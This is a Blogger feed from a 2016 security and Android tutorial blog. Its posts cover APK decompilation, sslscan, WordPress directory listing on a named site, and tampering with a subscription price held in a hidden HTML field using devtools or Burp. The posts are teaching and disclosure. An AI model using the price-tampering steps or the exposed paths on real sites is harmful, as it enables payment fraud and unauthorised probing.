<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-61466783976393317292016-03-24T23:12:00.001+05:302016-03-24T23:12:15.243+05:30Exploring Android: How to Read the AndroidManifest.xml file<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" height="192" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi Everyone,</b><br />
<b><br /></b>
<b>In the last post of exploring android we talked about How to decompile an Android App using dex2jar and JD-GUI.</b><br />
<b>but what if you want to read its AndroidManifest.xml or you need other files like images and many others.</b><br />
<b>There is also a way by which you can read these files Like AndroidManifest.xml file in order to get all the activities and the content provider exported.</b><br />
<b><br /></b>
<b>So to get all these files and folder mentioned in <a href="http://www.computerkorner.org/2016/02/exploring-android-what-is-android-apk.html" rel="nofollow" target="_blank">this</a> post then there is a tool which you can use.</b><br />
<b>to the name of the tool is apktool. You can download this tool from <a href="http://ibotpeaches.github.io/Apktool/" rel="nofollow" target="_blank">Here</a>.</b><br />
<b>After downloading the file paste it in a new folder.</b><br />
<h3 style="text-align: left;">
<b>Steps to Decompile </b></h3>
<div>
<ol style="text-align: left;">
<li><b>First of all copy the apktool in a separate folder and paste the android apk which you want to decompile in the same folder where you placed the APKtool.</b></li>
<li><b>Now open command prompt in the same folder. You can do it by pressing the shift with a right click.</b></li>
<li><b>Now give this command in the command prompt <i><u>java -jar apktool.jar androidPackagename.apk</u></i></b></li>
<li><b>A new folder will be created there with the name same as the package name of the android apk.</b></li>
<li><b>Now you can easily read all the files like AndroidManifest.xml files as well.</b></li>
</ol>
<b><div>
<b><br /></b></div>
If you need more info about this you can comment below and if you want a video showing this you can post that in comments as well.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks</b></div>
<div>
<b>Jitendra K Singh (Team Computer-Korner) </b></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-53673675830839068382016-03-14T23:38:00.000+05:302016-03-14T23:38:43.852+05:30Hidden HTML Tag: How they Can Lead to A Severe Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b><b>Hi there</b><br />
<b><br /></b>
<b>So this post is about how the hidden html tags can lead to a severe vulnerability.</b><br />
<br />
<br />
<h3 style="text-align: left;">
What are Hidden HTML tags ?</h3>
<div>
The basic syntax of defining a hidden html tag is <i><input type="hidden" name="any_name" value="value"></i></div>
<div>
this is highly used by the developers to define the CSRF token in the forms. However sometimes hidden HTML tag can lead to a severe vulnerability.</div>
<div>
<br /></div>
<h3 style="text-align: left;">
How this can lead to a Severe vulnerability ?</h3>
<b>Some days ago I was testing for vulnerabilities in a website. On this website we can upload Images and then we can share them with other or we can make our private album.</b><br />
<b>So they also have paid plan which gives more storage.</b><br />
<b><br /></b>
<b>I checked there plans there is a plan of 18Euro per year. they are also providing Paypal to pay.</b><br />
<b>However the price of the subscription was introduced in the hidden html tags. so this catches my attention.</b><br />
<b><br /></b>
<b>You can use two methods for exploiting this</b><br />
<b><br /></b>
<b>1. You can use Chrome developers tools open the inspect element there will a line of code like this</b><br />
<b><input type="hidden" value="18" name="a3"> what you have to do just change the value to any of your desireda like 1 or anything you want.</b><br />
<b><br /></b>
<b>2. You can use burp intercept the request and change the value of a3 and forward the request. and It will be done.</b><br />
<b><br /></b>
<b>So what the conclusion is you have dont have to define the price in the hidden html tag and you do this then you have to apply some other restrictions like matching the price when the payment is made etc.</b><br />
<b><br /></b>
<b><br /></b>
<b>Thats all for this post </b><br />
<b>Suggestion are welcome </b><br />
<b><br /></b>
<b><br /></b>
<b>Thanks </b><br />
<b>Jitendra Santram Singh (Team Computer Korner ) </b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-65424197780949750992016-03-09T00:07:00.000+05:302016-03-09T00:07:14.244+05:30Exploring Android:De-compiling An Android APK<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" height="192" width="320" /></a></div>
<br />
<b><br /></b>
<b><br /></b>
<b>H again </b><br />
<b><br /></b>
<b>So in last post we have talked about what is an Android APK.</b><br />
<b>So in this post we will talk about how to decompile an Android APK.</b><br />
<b>So in order to decompile an Android APK there are two tool which we will use</b><br />
<b><br /></b>
<b>1. Dex2jar: this is used to convert the android app in JAR format you can download it from <a href="https://sourceforge.net/projects/dex2jar/" rel="nofollow" target="_blank">here</a>.</b><br />
<b>2. JD-GUI:This is used to display the source code of .class file.</b><br />
<b>you can download it from <a href="http://jd.benow.ca/" rel="nofollow" target="_blank">here</a></b><br />
<b>So lets start</b><br />
<br />
<ul style="text-align: left;">
<li><b>Download the both the tools from the given link and extract dex2jar in a folder.</b></li>
<li><b>Now there will be several file in the Dex2Jar folder two files are important dex2jar.bat this is used for windows and dex2jar.sh this is used for Linux based OS</b></li>
<li><b>Now copy the android apk in the dex2jar folder and open the command prompt in the same location.</b></li>
<li><b>Now in command prompt type </b></li>
</ul>
<b><u>dex2jar.bat </u> android_package_name </b><div>
<b>and then press enter </b></div>
<div>
<b><br /></b></div>
<div>
<ul style="text-align: left;">
<li><b>After this a new file will be created in the same folder with the extension .jar.</b></li>
<li><b>Now open the JD-GUI and click on open new file , then select the .jar file you created above.</b></li>
<li><b>Now you can able to see the source code of the APK.</b></li>
</ul>
<b><div>
<b><br /></b></div>
This is a very simple thing you can do this easily but still if you need a video demonstration let me know I will upload a video for this.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Special thanks Gurpreet Singh</b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks </b></div>
<div>
Jitendra Santram Singh (Team Computer Korner)</div>
<div>
<br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-59988101900966733222016-02-17T12:14:00.001+05:302016-02-17T12:14:26.296+05:30Exploring Android: What is an Android APK<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" height="192" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b>Hi ,</b><br />
<b><br /></b>
<b>In past days I am busy in learning a new things so here is I am with a New Post</b><br />
<b><br /></b>
<b>So Android OS is used by most of the people So i thought I have to write some posts on android app components.So today I will explore What is an Android APK and what it consist of. So lets Start.</b><br />
<b><br /></b>
<b><br /></b>
<h3 style="text-align: left;">
<b>What is an Android App</b></h3>
<div>
<b>So Android Apps are basically compressed zip files You can easily extract them by changing the extension from APK to zip.</b></div>
<div>
<b>After extracting it , The APK consist of 6 folders and files these are </b></div>
<div>
<b><br /></b></div>
<br />
<ol style="text-align: left;">
<li><b>res</b></li>
<li><b>META-INF</b></li>
<li><b>assets</b></li>
<li><b>resources.arsc</b></li>
<li><b>classes.dex</b></li>
<li><b>AndroidManifest.xml</b></li>
</ol>
<b>So I will elborate what these files and folder consist of</b><br />
<b><br /></b>
<br />
<ul style="text-align: left;">
<li><b>res : This folder consist the resources for the Android App Like images xml files layout and many other resources which is used to make the Android app Like You added some logo or other resources.</b></li>
<li><b>META-INF: The META-INF folder is the home fort the MANIFEST.MF file. This file contains meta data about the contents of the JAR. For example, there is an entry called Main-Class that specifies the name of the Java class with the static main() for executable JAR files.</b></li>
<li><b>assests: This folder contains the Raw Approach to resource management.</b></li>
<li><b>resources.arsc: ARSC, or application resource files, are used by programs developed for the Google Android mobile operating system. They contain compiled resources in a binary format, and may include images, strings, or other data used by the program, usually included in an APK package file.</b></li>
<li><b>classes.dex: This Holds the Program codes.</b></li>
<li><b>AndroidManifest.xml: This contains the permission and the content uri paths and Services exported and activities.</b></li>
</ul>
<b><br /></b><br />
<b>So After Just de-compiling we get encoded AndroidManifest.xml file</b><br />
<b><br /></b>
<b>So In next post we will discuss how to decode the encoded AnroidManifest.xml.</b><br />
<b><br /></b>
<b>Thats all for this post</b><br />
<b><br /></b>
<b>Special Thanks to Gurpreet Singh </b><br />
<b>Stay tuned </b><br />
<b><br /></b>
<b>Cheers</b><br />
<b>Jitendra K Singh(Team Computer Korner)</b><br />
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-13647476417702860862016-01-29T12:45:00.001+05:302016-01-29T12:45:29.651+05:30Update to Computer Korner Android App<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi Dear followers</b><br />
<b><br /></b>
<b>Previous month we introduced our android app that was also a good app but we added some new features in the android app</b><br />
<b><br /></b>
<br />
<ul style="text-align: left;">
<li><b>Bugs Fixes related to UI</b></li>
<li><b>UI improvements</b></li>
<li><b>Search Bar added </b></li>
</ul>
<b>And Many other minor Improvements </b><div>
<b>You can download it from <a href="http://www.mediafire.com/download/5o4ant4chbptjrs/C_Korner.apk" rel="nofollow" target="_blank">here</a></b></div>
<div>
<b><br /></b></div>
<div>
<b>Enjoy and let us know if you want any other improvements to be added to the app </b></div>
<div>
<b><br /></b></div>
<div>
<b>Special Thank to Gaurav Arora </b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>Cheers</b></div>
<div>
<b>Jitendra Santram Singh ( Team Computer Korner)</b><ul style="text-align: left;">
</ul>
<br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-85606457113039581232016-01-28T14:46:00.001+05:302016-01-29T12:52:31.704+05:30WordPress Directory Listing : The Story of Cloakfusion Bug<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzyH7OHCQ-Cwq7-Q6noB3Wc4GRujOB57om99wZYEJAJO15cX5AH2gz3plkCEgG8pGb3wABsb-Trj5Aq0Jnb8adOjJPblqpeD9C9rcJSaiI3xJqEfCqV8hdmMb1hC7J_Mh1l1jdUHaKChA/s1600/Facebook_Cloaklogo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzyH7OHCQ-Cwq7-Q6noB3Wc4GRujOB57om99wZYEJAJO15cX5AH2gz3plkCEgG8pGb3wABsb-Trj5Aq0Jnb8adOjJPblqpeD9C9rcJSaiI3xJqEfCqV8hdmMb1hC7J_Mh1l1jdUHaKChA/s320/Facebook_Cloaklogo.png" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi Followers</b><br />
<b><br /></b>
<b>Due to the workload cant able to update the website but I am back with my work again </b><br />
<b><br /></b>
<br />
<h2 style="text-align: left;">
<b>The Story</b></h2>
<div>
<b>So this is a story of a very minor bug which most webmasters forgot to patch this is about the directory listing vulnerability in the WordPret</b><b>s and they think that they patched it.</b></div>
<div>
<br /></div>
<div>
But still the danger exists there are three folders in the WordPress main directory they are</div>
<div>
<ul style="text-align: left;">
<li>wp-admin</li>
<li>wp-content</li>
<li>wp-includes</li>
</ul>
what they actually do they only deny the access to these three directory but they forget that these directory also contains some other folders so to secure the website they should have to revoke the access to all of the folders of these three folders.</div>
<div>
<br /></div>
<div>
<br /></div>
<h2 style="text-align: left;">
The Bug</h2>
<div>
The bug exists here</div>
<div>
during browsing www.cloakfusion.com i found that it is a WordPress based website to first I tried some simple things like accessing the readme.html file but it was protected and the three directory is protected as well but after that I browsed the folder which are inside these three folders</div>
<div>
</div>
<div>
Then I tried</div>
<div>
<br /></div>
<div>
https://www.cloakfusion.com/wp-content/uploads </div>
<div>
and yes I can browse it </div>
<div>
I also tried </div>
<div>
https://www.cloakfusion.com/wp-includes/</div>
<div>
<br /></div>
<div>
and it was also not protected</div>
<div>
here are the screenshots of both</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSi098K9c9NEn571Ho4GzJRKZ_NQx-NnAXf7w4ROu1uRE6A6hdRA_jmEN8aN183qvgJbc65P7Ue4IYk_6BX7SJcmUUp8TwkEA56eSbAnsVEcnIslFOdA0rH2wdIuN97tgr7I4mpmbNpPs/s1600/cloak2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSi098K9c9NEn571Ho4GzJRKZ_NQx-NnAXf7w4ROu1uRE6A6hdRA_jmEN8aN183qvgJbc65P7Ue4IYk_6BX7SJcmUUp8TwkEA56eSbAnsVEcnIslFOdA0rH2wdIuN97tgr7I4mpmbNpPs/s320/cloak2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6NjKYjLtmvQ9payjoU5vA3tEwJRROrUuWmDjo1ZNLzDJZM0N_FptnGdrSiUF0aUScuusVrq8D1FJGOdmXyCw-729a7Qb5khkuRgIk0qrha-rNNCaYkDA5e1KTSg4X_kiq3zdvPV22Ja0/s1600/cloak.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6NjKYjLtmvQ9payjoU5vA3tEwJRROrUuWmDjo1ZNLzDJZM0N_FptnGdrSiUF0aUScuusVrq8D1FJGOdmXyCw-729a7Qb5khkuRgIk0qrha-rNNCaYkDA5e1KTSg4X_kiq3zdvPV22Ja0/s320/cloak.png" width="320" /></a></div>
<div>
<br /></div>
<h3 style="text-align: left;">
So this has to be patched by modifying the .htaccess file and deny the access to these folders</h3>
<div>
So tuned more is coming soon</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Thank You</div>
<div>
Jitendra Santram Singh (Team Computer Korner ) </div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-23328710071688334682015-12-27T19:13:00.000+05:302015-12-27T19:26:46.736+05:30Computer Korner Android App<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi Dear Ck lover</b><br />
<b><br /></b>
<b>It was a proud moment and my immense pleasure to announce the we are now on a android app.</b><br />
<b><br /></b>
<b>Due to the vast variety of smartphones we also thought then we should have a android app so here we are with our android app</b><br />
<b><br /></b>
<b>You can download our app from here </b><br />
<a href="http://www.mediafire.com/download/8ia82mw5a8d9myd/computer_korner.apk" rel="nofollow" target="_blank">Click here for app</a><br />
<br />
<br />
For this app i want to thank My best friend Gaurav Arora for his effort in creating this app and this was a surprise for our whole computer korner team<br />
<br />
<br />
Regards<br />
Jitendra (Team Computer Korner)<br />
<br />
Special Thanks to Gaurav Arora<br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com3tag:blogger.com,1999:blog-5302093523789144315.post-66445158432239499922015-12-27T19:04:00.003+05:302015-12-27T19:04:45.483+05:30WebApp Pentesting: Using SSLScan<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixoX3E8r4YZ2U7HP0ckG0mPrwYnlp_HdISNWiD7ii_F2-_egj81OiNGbV082k7tF_zF3bc0aiqUrR2d-EQdHtIdqQXYbB3N14DtwPzXz3lpghZCl2jqE-xyMnxuU924uRmbeCJsytM7YQ/s1600/backbox-2015-12-27-11-20-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixoX3E8r4YZ2U7HP0ckG0mPrwYnlp_HdISNWiD7ii_F2-_egj81OiNGbV082k7tF_zF3bc0aiqUrR2d-EQdHtIdqQXYbB3N14DtwPzXz3lpghZCl2jqE-xyMnxuU924uRmbeCJsytM7YQ/s1600/backbox-2015-12-27-11-20-17.png" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi ,</b><br />
<b><br /></b>
<b>So this is my another post on WebApp pentesting on how to enumerate the SSL/TLS ciphers used by a website and also about gathering the information on the SSL certificate used by the website.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
What is SSLScan</h3>
<div>
SSLScan is also a very good information gathering tools it is used to gathering about the SSL/TLS ciphers used by a website it also shows the information about SSL certificate used by the website.</div>
<div>
<br /></div>
<div>
<br /></div>
<h3 style="text-align: left;">
How to use SSLScan</h3>
<div>
<br /></div>
<div>
<div>
SSLScan comes pre installed in major linux distributions like backbox and kali linux.</div>
<div>
if this is not preinstalled on your distribution just simply type</div>
<div>
<br /></div>
<div>
sudo apt-get install sslscan</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOiMtpoA6f9dqn6BWNgBu1x1KXH3TtmapDtrSWnoYlFmXBMKz_wkJbiwnz2oiv_36dttM262qKkoMkDgBP1xKLHedJZ-VZh-q_HnkhyjeBiF8_NT_b_0BUf2Qv6TOM-v9XK1rSXZs9FBc/s1600/backbox-2015-12-27-11-20-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOiMtpoA6f9dqn6BWNgBu1x1KXH3TtmapDtrSWnoYlFmXBMKz_wkJbiwnz2oiv_36dttM262qKkoMkDgBP1xKLHedJZ-VZh-q_HnkhyjeBiF8_NT_b_0BUf2Qv6TOM-v9XK1rSXZs9FBc/s320/backbox-2015-12-27-11-20-17.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Now for scanning a website just simply type</div>
<div>
<br /></div>
<div>
sslscan -domain</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0pRQ8miSJoSt5SbdDKpPkYsCM4Xk40l27NzfaHF64oQCWS42jxkzyOgDK7wUMJQA4OhKve9oL-6vnBeA3znBqsNvgwRhG9vpi_nuYsULqUf8LRVYNLoU25p_Maj9t4ANLmUCIokvZXC8/s1600/backbox-2015-12-27-11-20-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0pRQ8miSJoSt5SbdDKpPkYsCM4Xk40l27NzfaHF64oQCWS42jxkzyOgDK7wUMJQA4OhKve9oL-6vnBeA3znBqsNvgwRhG9vpi_nuYsULqUf8LRVYNLoU25p_Maj9t4ANLmUCIokvZXC8/s320/backbox-2015-12-27-11-20-45.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Now it will start enumerating the ciphers used by that website like this </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
After that it will show you the information about the ssl certificate used by the website.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT-y7slXQAMCQYtjzP9N193VV3mLqBHyHinblCIeMwO8Qw9dRzXqL2teEBaihiB3GaNsPOfH7RPei1o83nG7XIC8qKjOl_5D-DWaDvJQL8dpCflZP3_lCXEQbW-iuy4Ypwxeh5_Vmwsak/s1600/backbox-2015-12-27-11-21-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT-y7slXQAMCQYtjzP9N193VV3mLqBHyHinblCIeMwO8Qw9dRzXqL2teEBaihiB3GaNsPOfH7RPei1o83nG7XIC8qKjOl_5D-DWaDvJQL8dpCflZP3_lCXEQbW-iuy4Ypwxeh5_Vmwsak/s320/backbox-2015-12-27-11-21-03.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1DbmNQMK3RBOj_jEfmI6ha1LUPqu_Ss6XcqdV2iWWYTrj5FqHaBpfJEjmBicNMEL_ynaMRKzUw_-_4BQXxvE599ZjgJ97gfOxfy5g2rJmzfL3XsXGYvttLjUDNxwgFGc32DUPde4A0QA/s1600/backbox-2015-12-27-11-21-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1DbmNQMK3RBOj_jEfmI6ha1LUPqu_Ss6XcqdV2iWWYTrj5FqHaBpfJEjmBicNMEL_ynaMRKzUw_-_4BQXxvE599ZjgJ97gfOxfy5g2rJmzfL3XsXGYvttLjUDNxwgFGc32DUPde4A0QA/s320/backbox-2015-12-27-11-21-22.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So by this method you can use sslscan and can find out the vulnerability based on the ssl cipher like POODLE vulnerability and other.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
More tutorials coming soon </div>
<div>
Stay tuned </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Thanks </div>
<div>
Jitendra Singh (Team Computer Korner )</div>
</div>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
